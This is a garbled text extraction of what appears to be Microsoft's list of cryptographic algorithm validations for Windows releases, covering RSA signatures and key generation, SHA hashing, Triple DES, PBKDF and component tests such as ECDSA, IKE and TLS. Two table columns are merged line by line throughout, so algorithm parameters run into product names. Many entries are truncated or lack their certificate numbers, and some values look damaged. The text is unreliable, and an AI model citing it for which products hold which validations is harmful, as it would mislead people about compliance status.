SIG(Ver) (1024 SHA( 1 , 256 , 384 , 512 )) (2048 SHA( 1 , 2015 Update; Windows 10 Mobile for Microsoft Lumia
256 , 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 )) 950 and Microsoft Lumia 635; Windows 10 for Microsoft
Surface Hub and Surface Hub MsBignum Cryptographic
SHA Val# 3047 Implementations #1888
Version 10.0.10586

[RSASSA-PSS]: Sig(Gen): (2048 SHA( 256 SaltLen( 32 ) , Surface Book, Surface Pro 4, Surface Pro 3, Surface 3,
384 SaltLen( 48 ) , 512 SaltLen( 64 ) )) (3072 SHA( 256 Surface Pro 2, and Surface Pro w/ Windows 10 November
SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) )) 2015 Update; Windows 10 Mobile for Microsoft Lumia
Sig(Ver): (1024 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , 950 and Microsoft Lumia 635; Windows 10 for Microsoft
384 SaltLen( 48 ) , 512 SaltLen( 62 ) )) (2048 SHA( 1 Surface Hub and Surface Hub Cryptography Next
SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 Generation (CNG) Implementations #1887
SaltLen( 64 ) )) (3072 SHA( 1 SaltLen( 20 ) , 256 SaltLen(
32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) )) Version 10.0.10586
SHA Val# 3047

186-4KEY(gen): FIPS186-4_Fixed_e ( 10001 ) ; Windows 10, Microsoft Surface 3 with Windows 10,
PGM(ProbPrimeCondition): 2048 , 3072 PPTT:( C.3 ) Microsoft Surface Pro 2 with Windows 10, Microsoft
Surface Pro with Windows 10 RSA Key Generation
SHA Val# 2886 DRBG: Val# 868 Implementation #1798
Version 10.0.10240

ALG[RSASSA-PKCS1_V1_5] SIG(Ver) (1024 SHA( 1 , 256 , Windows 10, Microsoft Surface 3 with Windows 10,
384 , 512 )) (2048 SHA( 1 , 256 , 384 , 512 )) (3072 SHA( Microsoft Surface Pro 2 with Windows 10, Microsoft
1 , 256 , 384 , 512 )) Surface Pro with Windows 10 RSA32 Algorithm
SHA Val#2871
Version 10.0.10240

ALG[RSASSA-PKCS1_V1_5] SIG(Ver) (1024 SHA( 1 , 256 , Windows 10, Microsoft Surface 3 with Windows 10,
384 , 512 )) (2048 SHA( 1 , 256 , 384 , 512 )) (3072 SHA( Microsoft Surface Pro 2 with Windows 10, Microsoft
1 , 256 , 384 , 512 )) Surface Pro with Windows 10 MsBignum Cryptographic
SHA Val#2871
Version 10.0.10240

[RSASSA-PSS]: Sig(Gen): (2048 SHA( 256 SaltLen( 32 ) , Windows 10, Microsoft Surface 3 with Windows 10,
384 SaltLen( 48 ) , 512 SaltLen( 64 ) )) (3072 SHA( 256 Microsoft Surface Pro 2 with Windows 10, Microsoft
SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) )) Surface Pro with Windows 10 Cryptography Next
Sig(Ver): (2048 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , Generation (CNG) Implementations #1802
384 SaltLen( 48 ) , 512 SaltLen( 64 ) )) (3072 SHA( 1
SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 Version 10.0.10240
SaltLen( 64 ) ))
SHA Val# 2886
186-4KEY(gen): FIPS186-4_Fixed_e ; R2, Microsoft Windows Storage Server 2012 R2, Microsoft
PGM(ProbPrimeCondition): 2048 , 3072 PPTT:( C.3 ) Windows RT 8.1, Microsoft Surface with Windows RT 8.1,
SHA Val#2373 DRBG: Val# 489 2, Microsoft Surface Pro 2, Microsoft Surface Pro 3,
RSA Key Generation Implementation #1487
Version 6.3.9600

ALG[RSASSA-PKCS1_V1_5] SIG(Ver) (1024 SHA( 1 , 256 , R2, Microsoft Windows Storage Server 2012 R2, Microsoft
384 , 512 )) (2048 SHA( 1 , 256 , 384 , 512 )) (3072 SHA( Windows RT 8.1, Microsoft Surface with Windows RT 8.1,
1 , 256 , 384 , 512 )) Microsoft Surface Pro with Windows 8.1, Microsoft Surface
SHA Val#2373 Microsoft Windows Phone 8.1, Microsoft Windows
Embedded 8.1 Industry RSA32 Algorithm
Version 6.3.9600

ALG[RSASSA-PKCS1_V1_5] SIG(gen) (2048 SHA( 256 , R2, Microsoft Windows Storage Server 2012 R2, Microsoft
384 , 512 )) (3072 SHA( 256 , 384 , 512 )) Windows RT 8.1, Microsoft Surface with Windows RT 8.1,
SIG(Ver) (1024 SHA( 1 , 256 , 384 , 512 )) (2048 SHA( 1 , Microsoft Surface Pro with Windows 8.1, Microsoft Surface
256 , 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 )) 2, Microsoft Surface Pro 2, Microsoft Surface Pro 3,
SHA Val#2373 Embedded 8.1 Industry and Microsoft StorSimple 8100
Version 6.3.9600
FIPS186-4: Windows Storage Server 2012 R2, Microsoft Windows RT

[RSASSA-PSS]: Sig(Gen): (2048 SHA( 256 SaltLen( 32 ) , 8.1, Microsoft Surface with Windows RT 8.1, Microsoft
384 SaltLen( 48 ) , 512 SaltLen( 64 ) )) (3072 SHA( 256 Surface Pro with Windows 8.1, Microsoft Surface 2,
SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) )) Microsoft Surface Pro 2, Microsoft Surface Pro 3, Microsoft
Sig(Ver): (1024 SHA( 1 SaltLen( 20 ) , 256 SaltLen( 32 ) , Windows Phone 8.1, Microsoft Windows Embedded 8.1
384 SaltLen( 48 ) , 512 SaltLen( 62 ) )) (2048 SHA( 1 Industry and Microsoft StorSimple 8100 Cryptography
SaltLen( 20 ) , 256 SaltLen( 32 ) , 384 SaltLen( 48 ) , 512 Next Generation Cryptographic Implementations #1519
SaltLen( 64 ) )) (3072 SHA( 1 SaltLen( 20 ) , 256 SaltLen(
32 ) , 384 SaltLen( 48 ) , 512 SaltLen( 64 ) )) Version 6.3.9600
SHA Val#2373
ALG[RSASSA-PKCS1_V1_5] SIG(gen) (2048 SHA( 256 , Windows RT, Surface Windows 8 Pro, and Windows Phone 8
384 , 512-256 )) (3072 SHA( 256 , 384 , 512-256 )) Cryptography Next Generation (CNG) Implementations #1134
SIG(Ver) (1024 SHA( 1 , 256 , 384 , 512-256 )) (2048 SHA(
1 , 256 , 384 , 512-256 )) (3072 SHA( 1 , 256 , 384 , 512-
256 ))
[RSASSA-PSS]: Sig(Gen): (2048 SHA( 256 , 384 , 512 ))
(3072 SHA( 256 , 384 , 512 ))
Sig(Ver): (1024 SHA( 1 , 256 , 384 , 512 )) (2048 SHA( 1 ,
256 , 384 , 512 )) (3072 SHA( 1 , 256 , 384 , 512 , 512 ))
SHA #1903
RSA List Val#1134.

186-4KEY(gen): FIPS186-4_Fixed_e , FIPS186- Windows RT, Surface Windows 8 Pro, and Windows Phone 8
4_Fixed_e_Value RSA Key Generation Implementation #1133
PGM(ProbPrimeCondition): 2048 , 3072 PPTT:( C.3 )
SHA #1903 DRBG: #258

ALG[ANSIX9.31]: Key(gen)(MOD: 2048 , 3072 , 4096 PubKey Windows RT, Surface Windows 8 Pro, and Windows Phone 8
Values: 65537 DRBG: #258 Enhanced Cryptographic Provider (RSAENH) #1132
ALG[RSASSA-PKCS1_V1_5]: SIG(gen) 2048 , 3072 , 4096 ,
SHS: SHA-256#1902, SHA-384#1902, SHA-512#1902,
SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
1#1902, SHA-256#1902, SHA-#1902, SHA-512#1902,
compliant per the SP800-131A transition. See Historical RSA
List Val#1132.
FIPS186-2: Windows Embedded Compact 7 Enhanced Cryptographic

SIG(ver); 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
1Val#1774
SHS: SHA-256Val#1774, SHA-384Val#1774, SHA-
512Val#1774,
SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
512Val#1774,
List Val#1052.
ALG[ANSIX9.31]: Key(gen)(MOD: 2048 , 3072 , 4096 PubKey Library (bcrypt.dll) #1051
Values: 65537 DRBG: Val# 193
512Val#1773,
SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
512Val#1773,
List Val#1051.
FIPS186-2: Windows Server 2008 R2 and SP1 Enhanced Cryptographic

ALG[RSASSA-PKCS1_V1_5]: SIG(gen) 2048 , 3072 , 4096 , Provider (RSAENH) #568
512Val#1081,
SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
512Val#1081,
List Val#568.

SHS: SHA-256Val#1081, SHA-384Val#1081, SHA- Windows 7 and SP1 CNG algorithms #560
512Val#1081,
SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
512Val#1081,
ALG[RSASSA-PSS]: SIG(gen); 2048 , 3072 , 4096 , SHS: SHA-
SIG(ver); 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
512Val#1081
List Val#567. See Historical RSA List Val#560.
FIPS186-2: Windows 7 and SP1 and Server 2008 R2 and SP1 RSA Key
ALG[ANSIX9.31]: Key(gen)(MOD: 2048 , 3072 , 4096 PubKey Generation Implementation #559
Values: 65537 DRBG: Val# 23
List Val#559.
FIPS186-2: Windows 7 and SP1 Enhanced Cryptographic Provider

ALG[RSASSA-PKCS1_V1_5]: SIG(gen) 2048 , 3072 , 4096 , (RSAENH) #557
512Val#1081,
SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
512Val#1081,
List Val#557.
FIPS186-2: Windows Server 2003 SP2 Enhanced Cryptographic Provider
ALG[ANSIX9.31]: (RSAENH) #395
SHS: SHA-256Val#816, SHA-384Val#816, SHA-512Val#816,
SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
512Val#816,
List Val#395.
FIPS186-2: Windows XP Professional SP3 Enhanced Cryptographic

SIG(ver); 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
1Val#783
List Val#371.

SHS: SHA-256Val#753, SHA-384Val#753, SHA-512Val#753, Windows Vista SP1 CNG algorithms #357
SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
512Val#753,
SIG(ver); 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
512Val#753
FIPS186-2: Windows Server 2008 Enhanced Cryptographic Provider

SIG(ver); 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
1Val#753 Windows Vista SP1 Enhanced Cryptographic Provider
ALG[RSASSA-PKCS1_V1_5]: SIG(gen) 2048 , 3072 , 4096 , (RSAENH) #354
SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
512Val#753,
FIPS186-2: Windows Vista SP1 and Windows Server 2008 RSA Key
ALG[ANSIX9.31]: Key(gen)(MOD: 2048 , 3072 , 4096 PubKey Generation Implementation #353
Values: 65537
List Val#353.
FIPS186-2: Windows Vista RSA key generation implementation #258
ALG[ANSIX9.31]: Key(gen)(MOD: 2048 , 3072 , 4096 PubKey
Values: 65537 RNG: Val# 321
List Val#258.

SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
512Val#618,
SIG(ver); 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
512Val#618
List Val#257.
FIPS186-2: Windows Vista Enhanced Cryptographic Provider (RSAENH)

ALG[RSASSA-PKCS1_V1_5]: SIG(gen) 2048 , 3072 , 4096 , #255
SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
512Val#618,
List Val#255.

SIG(ver); 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
1Val#613
SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
512Val#613,
List Val#245.
FIPS186-2: Windows CE 6.0 and Windows CE 6.0 R2 and Windows Mobile

ALG[ANSIX9.31]: Enhanced Cryptographic Provider (RSAENH) #230
SIG(ver); 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
1Val#589
SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
512Val#589,
List Val#230.
FIPS186-2: Windows CE and Windows Mobile 6 and Windows Mobile 6.1
ALG[ANSIX9.31]: Enhanced Cryptographic Provider (RSAENH) #222
SIG(ver); 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
1Val#578
SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
512Val#578,
List Val#222.

ALG[RSASSA-PKCS1_V1_5]: (RSAENH) #81
SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
1Val#364
List Val#81.
FIPS186-2: Windows CE 5.00 and Windows CE 5.01 Enhanced

ALG[ANSIX9.31]: Cryptographic Provider (RSAENH) #52
SIG(ver); 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
1Val#305
SIG(ver): 1024 , 1536 , 2048 , 3072 , 4096 , SHS: SHA-
512Val#305,
List Val#52.
FIPS186-2: Windows XP, vendor-affirmed

– PKCS#1 v1.5, signature generation and verification Windows 2000, vendor-affirmed
– Mod sizes: 1024, 1536, 2048, 3072, 4096
– SHS: SHA–1/256/384/512
Secure Hash Standard (SHS)
SHA-1: Microsoft Surface Hub SymCrypt Cryptographic

Supports Empty Message Implementations #4011
SHA-256:
Version 10.0.15063.674
Supports Empty Message
SHA-384:
SHA-512:
SHA-1: Windows 10 Mobile (version 1709) SymCrypt
Supports Empty Message Cryptographic Implementations #4010
SHA-256:
Version 10.0.15254
SHA-384:
SHA-512:
SHA-1: Windows 10 Home, Pro, Enterprise, Education, Windows

Supports Empty Message 10 S Fall Creators Update and Windows Server, Windows
SHA-256: Server Datacenter (version 1709); SymCrypt
Supports Empty Message Cryptographic Implementations #4009
SHA-384: Version 10.0.16299
SHA-512:
SHA-1 (BYTE-only) Windows 10 Creators Update (version 1703) Home, Pro,

SHA-256 (BYTE-only) Enterprise, Education, Windows 10 S, Windows 10 Mobile
SHA-384 (BYTE-only) SymCrypt Cryptographic Implementations #3790
SHA-512 (BYTE-only)
Version 10.0.15063
SHA-1 (BYTE-only) Windows Embedded Compact Enhanced Cryptographic

SHA-256 (BYTE-only) Provider (RSAENH) #3652
SHA-384 (BYTE-only)
SHA-512 (BYTE-only) Version 7.00.2872
SHA-1 (BYTE-only) Windows Embedded Compact Enhanced Cryptographic

SHA-384 (BYTE-only)
SHA-1 (BYTE-only) Windows Embedded Compact Cryptographic Primitives

SHA-256 (BYTE-only) Library (bcrypt.dll) #3649
SHA-384 (BYTE-only)
SHA-1 (BYTE-only) Windows Embedded Compact Cryptographic Primitives

SHA-256 (BYTE-only) Library (bcrypt.dll) #3648
SHA-384 (BYTE-only)
SHA-1 (BYTE-only) Microsoft Windows 10 Anniversary Update, Windows Server

SHA-256 (BYTE-only) 2016, Windows Storage Server 2016; Microsoft Surface Book,
SHA-384 (BYTE-only) Surface Pro 4, Surface Pro 3 and Surface 3 w/ Windows 10
SHA-512 (BYTE-only) Anniversary Update; Microsoft Lumia 950 and Lumia 650 w/
Windows 10 Mobile Anniversary Update SymCrypt
Version 10.0.14393
SHA-1 (BYTE-only) Microsoft Windows 10 Anniversary Update, Windows Server
SHA-256 (BYTE-only) 2016, Windows Storage Server 2016; Microsoft Surface Book,
SHA-384 (BYTE-only) Surface Pro 4, Surface Pro 3 and Surface 3 w/ Windows 10
SHA-512 (BYTE-only) Anniversary Update; Microsoft Lumia 950 and Lumia 650 w/
Windows 10 Mobile Anniversary Update RSA32 Algorithm
Version 10.0.14393
SHA-1 (BYTE-only) Microsoft Windows 10 November 2015 Update; Microsoft

SHA-256 (BYTE-only) Surface Book, Surface Pro 4, Surface Pro 3, Surface 3, Surface
SHA-384 (BYTE-only) Pro 2, and Surface Pro w/ Windows 10 November 2015
SHA-512 (BYTE-only) Update; Windows 10 Mobile for Microsoft Lumia 950 and
and Surface Hub RSA32 Algorithm Implementations #3048
Version 10.0.10586
SHA-1 (BYTE-only) Microsoft Windows 10 November 2015 Update; Microsoft

SHA-256 (BYTE-only) Surface Book, Surface Pro 4, Surface Pro 3, Surface 3, Surface
SHA-384 (BYTE-only) Pro 2, and Surface Pro w/ Windows 10 November 2015
SHA-512 (BYTE-only) Update; Windows 10 Mobile for Microsoft Lumia 950 and
and Surface Hub SymCrypt Cryptographic Implementations
#3047
Version 10.0.10586
SHA-1 (BYTE-only) Microsoft Windows 10, Microsoft Surface Pro 3 with Windows
SHA-256 (BYTE-only) 10, Microsoft Surface 3 with Windows 10, Microsoft Surface
SHA-384 (BYTE-only) Pro 2 with Windows 10, Microsoft Surface Pro with Windows
SHA-512 (BYTE-only) 10 SymCrypt Cryptographic Implementations #2886
Version 10.0.10240
SHA-1 (BYTE-only) Microsoft Windows 10, Microsoft Surface Pro 3 with Windows
SHA-256 (BYTE-only) 10, Microsoft Surface 3 with Windows 10, Microsoft Surface
SHA-384 (BYTE-only) Pro 2 with Windows 10, Microsoft Surface Pro with Windows
SHA-512 (BYTE-only) 10 RSA32 Algorithm Implementations #2871
Version 10.0.10240
SHA-1 (BYTE-only) Microsoft Windows 8.1, Microsoft Windows Server 2012 R2,
SHA-256 (BYTE-only) Microsoft Windows Storage Server 2012 R2, Microsoft
SHA-384 (BYTE-only) Windows RT 8.1, Microsoft Surface with Windows RT 8.1,
SHA-512 (BYTE-only) Microsoft Surface Pro with Windows 8.1, Microsoft Surface 2,
Industry RSA32 Algorithm Implementations #2396
Version 6.3.9600
SHA-1 (BYTE-only) Windows Storage Server 2012 R2, Microsoft Windows RT 8.1,
SHA-256 (BYTE-only) Microsoft Surface with Windows RT 8.1, Microsoft Surface Pro
SHA-384 (BYTE-only) with Windows 8.1, Microsoft Surface 2, Microsoft Surface Pro
SHA-512 (BYTE-only) 2, Microsoft Surface Pro 3, Microsoft Windows Phone 8.1,
Microsoft Windows Embedded 8.1 Industry and Microsoft
StorSimple 8100 SymCrypt Cryptographic Implementations
#2373
Version 6.3.9600
SHA-1 (BYTE-only) Windows 8, Windows RT, Windows Server 2012, Surface
Windows RT, Surface Windows 8 Pro, and Windows Phone
SHA-256 (BYTE-only) 8 Next Generation Symmetric Cryptographic Algorithms
SHA-384 (BYTE-only) Implementations (SYMCRYPT) #1903
SHA-512 (BYTE-only) Windows 8, Windows RT, Windows Server 2012, Surface
Implementation does not support zero-length (null) 8 Symmetric Algorithm Implementations (RSA32) #1902
messages.
SHA-1 (BYTE-only) Windows Embedded Compact 7 Enhanced Cryptographic

SHA-384 (BYTE-only)
SHA-512 (BYTE-only) Windows Embedded Compact 7 Cryptographic Primitives
SHA-1 (BYTE-only) Windows 7and SP1 and Windows Server 2008 R2 and SP1
SHA-256 (BYTE-only) Symmetric Algorithm Implementation #1081
SHA-384 (BYTE-only)
SHA-512 (BYTE-only) Windows Server 2003 SP2 Enhanced Cryptographic
SHA-1 (BYTE-only) Windows XP Professional SP3 Kernel Mode Cryptographic

Windows XP Professional SP3 Enhanced DSS and Diffie-
Hellman Cryptographic Provider (DSSENH) #784
SHA-1 (BYTE-only) Windows XP Professional SP3 Enhanced Cryptographic

SHA-384 (BYTE-only)
SHA-512 (BYTE-only)
SHA-1 (BYTE-only) Windows Vista SP1 and Windows Server 2008 Symmetric
SHA-256 (BYTE-only) Algorithm Implementation #753
SHA-384 (BYTE-only)
SHA-512 (BYTE-only) Windows Vista Symmetric Algorithm Implementation
#618
SHA-1 (BYTE-only) Windows Vista BitLocker Drive Encryption #737

SHA-256 (BYTE-only)
Windows Vista Beta 2 BitLocker Drive Encryption #495

SHA-384 (BYTE-only)
SHA-1 (BYTE-only) Windows Server 2003 SP2 Enhanced DSS and Diffie-
Windows Server 2003 Enhanced DSS and Diffie-Hellman
Cryptographic Provider (DSSENH) #181
Windows Server 2003 Kernel Mode Cryptographic Module
(fips.sys) #177
(RSAENH) #176
SHA-1 (BYTE-only) Windows CE 6.0 and Windows CE 6.0 R2 and Windows

SHA-256 (BYTE-only) Mobile Enhanced Cryptographic Provider (RSAENH) #589
SHA-384 (BYTE-only)
SHA-512 (BYTE-only) Windows CE and Windows Mobile 6 and Windows Mobile
6.5 Enhanced Cryptographic Provider (RSAENH) #578
Windows CE 5.00 and Windows CE 5.01 Enhanced
SHA-1 (BYTE-only) Windows XP Microsoft Enhanced Cryptographic Provider

#83
Crypto Driver for Windows 2000 (fips.sys) #35
Windows 2000 Microsoft Outlook Cryptographic Provider
(EXCHCSP.DLL) SR-1A (3821) #32
Windows 2000 RSAENH.DLL #24
Windows 2000 RSABASE.DLL #23
Windows NT 4 SP6 RSAENH.DLL #21
Windows NT 4 SP6 RSABASE.DLL #20
Triple DES
TDES-CBC: Microsoft Surface Hub SymCrypt Cryptographic

Modes: Decrypt, Encrypt Implementations #2558
Keying Option: 1
Version 10.0.15063.674
TDES-CFB64:
Keying Option: 1
TDES-CFB8:
Keying Option: 1
TDES-ECB:
Keying Option: 1
TDES-CBC: Windows 10 Mobile (version 1709) SymCrypt
Modes: Decrypt, Encrypt Cryptographic Implementations #2557
Keying Option: 1
Version 10.0.15254
TDES-CFB64:
Keying Option: 1
TDES-CFB8:
Keying Option: 1
TDES-ECB:
Keying Option: 1
TDES-CBC: Windows 10 Home, Pro, Enterprise, Education, Windows

Keying Option: 1 Server Datacenter (version 1709); SymCrypt
TDES-CFB64: Cryptographic Implementations #2556
Modes: Decrypt, Encrypt Version 10.0.16299
Keying Option: 1
TDES-CFB8:
Keying Option: 1
TDES-ECB:
Keying Option: 1
TECB( KO 1 e/d, ) ; TCBC( KO 1 e/d, ) ; TCFB8( KO 1 e/d, ) ; Windows 10 Creators Update (version 1703) Home, Pro,
TCFB64( KO 1 e/d, ) Enterprise, Education, Windows 10 S, Windows 10 Mobile
Version 10.0.15063
TECB( KO 1 e/d, ) ; Windows Embedded Compact Enhanced Cryptographic

TCBC( KO 1 e/d, )
Version 8.00.6246
TECB( KO 1 e/d, ) ; Windows Embedded Compact Enhanced Cryptographic

TCBC( KO 1 e/d, )
Version 8.00.6246
TECB( KO 1 e/d, ) ; Windows Embedded Compact Cryptographic Primitives

TCBC( KO 1 e/d, ) ;
Version 7.00.2872
CTR ( int only )
TECB( KO 1 e/d, ) ; Windows Embedded Compact Cryptographic Primitives

TCBC( KO 1 e/d, )
Version 8.00.6246
TECB( KO 1 e/d, ) ; Microsoft Windows 10 Anniversary Update, Windows
TCBC( KO 1 e/d, ) ; Surface Book, Surface Pro 4, Surface Pro 3 and Surface 3
TCFB8( KO 1 e/d, ) ; w/ Windows 10 Anniversary Update; Microsoft Lumia 950
TCFB64( KO 1 e/d, ) Update SymCrypt Cryptographic Implementations #2227
Version 10.0.14393
TECB( KO 1 e/d, ) ; Microsoft Windows 10 November 2015 Update; Microsoft

Surface Book, Surface Pro 4, Surface Pro 3, Surface 3,
TCBC( KO 1 e/d, ) ; Surface Pro 2, and Surface Pro w/ Windows 10 November
TCFB8( KO 1 e/d, ) ; 2015 Update; Windows 10 Mobile for Microsoft Lumia
TCFB64( KO 1 e/d, ) Surface Hub and Surface Hub SymCrypt Cryptographic
Version 10.0.10586
TECB( KO 1 e/d, ) ; Microsoft Windows 10, Microsoft Surface Pro 3 with

Windows 10, Microsoft Surface 3 with Windows 10,
TCBC( KO 1 e/d, ) ; Microsoft Surface Pro 2 with Windows 10, Microsoft
TCFB8( KO 1 e/d, ) ; Surface Pro with Windows 10 SymCrypt Cryptographic
TCFB64( KO 1 e/d, )
Version 10.0.10240
TECB( KO 1 e/d, ) ; Windows Storage Server 2012 R2, Microsoft Windows RT

8.1, Microsoft Surface with Windows RT 8.1, Microsoft
TCBC( KO 1 e/d, ) ; Surface Pro with Windows 8.1, Microsoft Surface 2,
TCFB8( KO 1 e/d, ) ; Microsoft Surface Pro 2, Microsoft Surface Pro 3, Microsoft
TCFB64( KO 1 e/d, ) Industry and Microsoft StorSimple 8100 SymCrypt
Version 6.3.9600
TECB( e/d; KO 1,2 ) ; Windows 8, Windows RT, Windows Server 2012, Surface
TCBC( e/d; KO 1,2 ) ; Next Generation Symmetric Cryptographic Algorithms
TCFB8( e/d; KO 1,2 ) ; Implementations (SYMCRYPT) #1387
TCFB64( e/d; KO 1,2 )
TECB( e/d; KO 1,2 ) ; Windows 8, Windows RT, Windows Server 2012, Surface
TCBC( e/d; KO 1,2 ) ; Symmetric Algorithm Implementations (RSA32) #1386
TCFB8( e/d; KO 1,2 )
TECB( e/d; KO 1,2 ) ; Windows 7 and SP1 and Windows Server 2008 R2 and SP1
TCBC( e/d; KO 1,2 ) ;
TECB( e/d; KO 1,2 ) ; Windows Vista SP1 and Windows Server 2008 Symmetric
Algorithm Implementation #656
TCBC( e/d; KO 1,2 ) ;
TECB( e/d; KO 1,2 ) ; Windows Vista Symmetric Algorithm Implementation #549

TCBC( e/d; KO 1,2 ) ;
Triple DES MAC Windows 8, Windows RT, Windows Server 2012, Surface
8 #1386, vendor-affirmed
Windows 7 and SP1 and Windows Server 2008 R2 and
SP1 #846, vendor-affirmed
TECB( e/d; KO 1,2 ) ; Windows Embedded Compact 7 Enhanced Cryptographic
TCBC( e/d; KO 1,2 )
Windows Embedded Compact 7 Cryptographic Primitives
Windows XP Professional SP3 Kernel Mode Cryptographic
Windows XP Professional SP3 Enhanced DSS and Diffie-
Windows CE 6.0 and Window CE 6.0 R2 and Windows
Windows CE and Windows Mobile 6 and Windows Mobile
6.1 and Windows Mobile 6.5 Enhanced Cryptographic
Windows CE 5.00 and Windows CE 5.01 Enhanced
Windows Server 2003 Kernel Mode Cryptographic Module
(fips.sys) #201
Windows Server 2003 Enhanced DSS and Diffie-Hellman
Cryptographic Provider (DSSENH) #199
(RSAENH) #192
Windows XP Microsoft Enhanced Cryptographic Provider
#81
Windows 2000 Microsoft Outlook Cryptographic Provider
(EXCHCSP.DLL) SR-1A (3821) #18
Crypto Driver for Windows 2000 (fips.sys) #16
SP 800-132 Password Based Key Derivation Function (PBKDF)

PBKDF (vendor affirmed) Kernel Mode Cryptographic Primitives Library (cng.sys) Cryptographic Primitives
Library (bcryptprimitives.dll and ncryptsslp.dll) in Microsoft Windows 10,
Windows 10 Pro, Windows 10 Enterprise, Windows 10 Enterprise LTSB, Windows
10 Mobile, Windows Server 2016 Standard, Windows Server 2016 Datacenter,
Windows Storage Server 2016 #2937
(Software Version: 10.0.14393)
Microsoft Windows 10, Windows 10 Pro, Windows 10 Enterprise, Windows 10
Enterprise LTSB, Windows 10 Mobile, Windows Server 2016 Standard, Windows
Server 2016 Datacenter, Windows Storage Server 2016 #2936
Code Integrity (ci.dll) in Microsoft Windows 10, Windows 10 Pro, Windows 10
Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server
2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016
#2935
Boot Manager in Microsoft Windows 10, Windows 10 Pro, Windows 10
Enterprise, Windows 10 Enterprise LTSB, Windows 10 Mobile, Windows Server
2016 Standard, Windows Server 2016 Datacenter, Windows Storage Server 2016
#2931
PBKDF (vendor affirmed) Kernel Mode Cryptographic

Primitives Library (cng.sys) in
Microsoft Windows 10, Windows 10
Pro, Windows 10 Enterprise,
Windows 10 Enterprise LTSB,
Windows 10 Mobile, Windows
Server 2016 Standard, Windows
Server 2016 Datacenter, Windows
Storage Server 2016 #2936
Windows 8, Windows RT, Windows
Server 2012, Surface Windows RT,
Surface Windows 8 Pro, and
Windows Phone 8 Cryptography
Next Generation (CNG), vendor-
affirmed
Component Validation List
Publication / Component Validated / Description Implementation and Certificate #
ECDSA SigGen: Microsoft Windows 8.1, Microsoft Windows Server 2012

P-256 SHA: SHA-256 R2, Microsoft Windows Storage Server 2012 R2, Microsoft
P-384 SHA: SHA-384 Windows RT 8.1, Microsoft Surface with Windows RT 8.1,
P-521 SHA: SHA-512 Microsoft Surface Pro with Windows 8.1, Microsoft Surface
Prerequisite: DRBG #489 Microsoft Windows Phone 8.1, Microsoft Windows
Version 6.3.9600
RSASP1: Microsoft Surface Hub Virtual TPM Implementations

Modulus Size: 2048 (bits) #1519
Padding Algorithms: PKCS 1.5
Version 10.0.15063.674
RSASP1: Windows 10 Home, Pro, Enterprise, Education, Windows
Modulus Size: 2048 (bits) 10 S Fall Creators Update and Windows Server, Windows
Padding Algorithms: PKCS 1.5 Server Datacenter (version 1709); Virtual TPM
Version 10.0.16299
RSADP: Microsoft Surface Hub MsBignum Cryptographic

Modulus Size: 2048 (bits) Implementations #1517
Version 10.0.15063.674
RSASP1: Microsoft Surface Hub MsBignum Cryptographic

Version 10.0.15063.674
ECDSA SigGen: Microsoft Surface Hub MsBignum Cryptographic

P-256 SHA: SHA-256 Implementations #1515
P-384 SHA: SHA-384
Version 10.0.15063.674
P-521 SHA: SHA-512
Prerequisite: DRBG #1732
ECDSA SigGen: Microsoft Surface Hub SymCrypt Cryptographic

P-256 SHA: SHA-256 Implementations #1514
P-384 SHA: SHA-384
Version 10.0.15063.674
P-521 SHA: SHA-512
RSADP: Microsoft Surface Hub SymCrypt Cryptographic

Version 10.0.15063.674
RSASP1: Microsoft Surface Hub SymCrypt Cryptographic

Version 10.0.15063.674
IKEv1: Microsoft Surface Hub SymCrypt Cryptographic
Methods: Digital Signature, Pre-shared Key, Implementations #1511
Public Key Encryption
Version 10.0.15063.674
Pre-shared Key Length: 64-2048
Diffie-Hellman shared secrets:
Diffie-Hellman shared secret:
Length: 2048 (bits)
SHA Functions: SHA-256
Length: 256 (bits)
Length: 384 (bits)
Prerequisite: SHS #4011, HMAC #3269
IKEv2:
Derived Keying Material length: 192-1792
Length: 2048 (bits)
Length: 256 (bits)
Length: 384 (bits)
TLS:
Supports TLS 1.0/1.1
Supports TLS 1.2:
SHA Functions: SHA-256, SHA-384
ECDSA SigGen: Windows 10 Mobile (version 1709) SymCrypt

